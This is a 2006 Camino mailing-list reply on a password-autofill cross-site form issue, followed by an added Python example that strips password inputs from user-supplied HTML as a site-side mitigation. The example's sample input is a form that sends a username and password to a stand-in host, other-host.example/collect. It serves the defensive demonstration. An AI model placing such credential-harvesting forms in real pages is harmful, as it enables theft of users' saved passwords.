[Camino] Security issue: Cross-site forms and password autofill
Stuart Morgan
stuart.morgan at alumni.case.edu
Thu Nov 23 16:54:53 PST 2006
On Nov 23, 2006, at 8:51 AM, Martin Girschick wrote:
> I guess a way to temporarily disable password auto-fill until the
> issue is resolved is to uncheck "Save web form passwords..." in the
> "Privacy"-section.
Or just remove/don't store passwords for sites with largely
unrestricted, user-provided content. The attack only applies to
sites where:
a) you have to log in to the site, and
b) people other than site admins have the ability to create HTML
forms with password elements on the site, and
c) the realm of the login page is the same as the realm of the user-created pages (i.e., there is not a login.foo.com page for logging in).
The fraction of sites on the web meeting those criteria is very, very
small. Simply not using password storage on those particular sites
is just as secure as turning the feature off completely, with much
less reduction in functionality.
-Stuart
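Condition (b) above is the one a site operator controls. As an added example, not from the Camino thread or the Camino code base, the following Python strips `<input type="password">` elements from user-provided HTML before it is rendered on the same realm as the login page, so a browser's autofill has no password field to populate. The sample post and the `other-host.example` form action are constructed inputs.

```python
# Added example: site-side mitigation for condition (b). A forum or wiki that
# renders user-supplied HTML on the same realm as its login page removes
# password inputs so autofill has nothing to fill. Other markup is passed
# through unchanged; this is not a general-purpose HTML sanitizer.
from html.parser import HTMLParser


class PasswordFieldStripper(HTMLParser):
    """Re-emit the input HTML minus <input type="password"> elements."""

    def __init__(self):
        # convert_charrefs=False so entities are re-emitted verbatim below.
        super().__init__(convert_charrefs=False)
        self.out = []
        self.dropped = 0  # number of password inputs removed

    def handle_starttag(self, tag, attrs):
        # attrs is a list of (name, value); value may be None for bare attrs.
        if tag == "input" and any(
            k == "type" and (v or "").lower() == "password" for k, v in attrs
        ):
            self.dropped += 1
            return  # drop the element
        self.out.append(self.get_starttag_text())  # original tag text

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # <input .../> form

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(data)

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")

    def handle_comment(self, data):
        self.out.append(f"<!--{data}-->")


def strip_password_fields(user_html):
    """Return (cleaned_html, number_of_password_inputs_removed)."""
    parser = PasswordFieldStripper()
    parser.feed(user_html)
    parser.close()
    return "".join(parser.out), parser.dropped


# Constructed sample of user-provided content containing a password field.
SAMPLE_POST = (
    '<p>Rate my post!</p>'
    '<form action="http://other-host.example/collect" method="post">'
    '<input name="user"><input type="PASSWORD" name="pw"/>'
    '<input type="submit"></form>'
)
```

Calling `strip_password_fields(SAMPLE_POST)` keeps the paragraph, the form and the other inputs, and reports one password field removed.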